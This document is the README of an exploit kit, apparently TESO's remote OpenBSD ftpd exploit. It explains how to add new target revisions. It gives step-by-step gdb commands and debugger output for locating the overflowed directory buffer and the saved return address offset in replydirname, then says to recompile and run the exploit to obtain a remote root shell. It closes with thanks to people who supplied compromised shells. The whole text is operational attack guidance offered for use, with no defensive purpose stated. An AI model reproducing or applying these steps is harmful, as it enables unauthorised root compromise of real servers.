TESO REMOTE OPENBSD FTPD EXPLOIT                   <caddis@el8.org>
===================================================================

UPDATING EXPLOIT
----------------

The current target vectors supplied in this exploit only include 
OpenBSD BASE branches ranging from 2.7 - 2.8. There are quite a few
revisions of vulnerable ftpd.c code, starting at branch 
OPENBSD_2_4_BASE, ftpd.c 1.49 and including up to branch OPENBSD_2_8,
ftpd.c 1.79. I don't have time to collect target vectors for each of
these ftpd's, so instead i'm supplying vague update instructions. 
Please don't email me reporting the exploit does not work until you 
read and follow the below instructions.

In order to add a new revision some ground work is required. First
you will require an account on the target system. Download the 
source code for the /usr/libexec/ftpd target revision if it is not 
available on the target host. Compile the ftpd source code, be sure 
the symbols do not get stripped. Depending on the revision, you may
also require the source code for /bin/ls and /usr/bin/login.

Add a dummy target vector to the targets array like the following:
{ "TEST", 0x73507350, 800 }

Before compiling the exploit, edit the makefile and uncomment 
the -DDEBUG option. Run the exploit against the target host and
wait for the message "Ok, waiting, attach now.".

At this point you must attach gdb to the ftpd process on the target
host. Obtain the pid of the ftpd process which the exploit is 
connected to and run:

gdb /usr/src/libexec/ftpd/ftpd pid_of_process

Once gdb is attached we need to disasseble replydirname so we can 
obtain the location in text segment where replydirname restores the 
old stack frame and returns. Search for the leave and ret 
instructions.

(gdb) disassemble replydirname
Dump of assembler code for function replydirname:
....
0x59ef <replydirname+91>:       leave
0x59f0 <replydirname+92>:       ret
....
End of assembler dump.

Now we need to set a break point on the leave instruction and 
resume process execution.

(gdb) b *0x59ef
Breakpoint 1 at 0x59ef: file ftpd.c, line 1971.
(gdb) c
Continuing.

Once the break point is reached we need to locate the address where
our evil directory starts. Use the following command to obtain this
address.

(gdb) x/x $ebp + 8
0xdfbfcfb0:     0xdfbfcfd8

Ok, now that we know where the directory starts, we need to obtain
the offset from this address to the position in memory where our
new saved address should be written. Step onto the next instruction.

(gdb) ni

To obtain the address where the current saved ip is located use the
following command.

(gdb) x/x $ebp + 4
0xdfbfd304:     0x54545454

We now have the both addresses required to calculate the saved ip 
offset from the directory buffer. 

(gdb) p (0xdfbfd304 - 0xdfbfcfd8)
$1 = 812

It's now time to update the exploit vector.
{ "TEST", 0xdfbfcfd8, 812 }

Recompile the exploit and run it against the target system. If
all goes well you should have a remote root shell :)


MODS
----

See main.c for tunables. You can add directory hints and change
the default username, password and port. 

THANKS
------

Big thanks goes out to the following people in no particular order 
for providing me with shells to work with:

arch, interrupt, k2, howler, lst, skyper, hendy, sl0ppy, peltier, 
kraze, dedmunk and hostile.

Also greetz and thanks to all the members of #crocodile_wrestling.
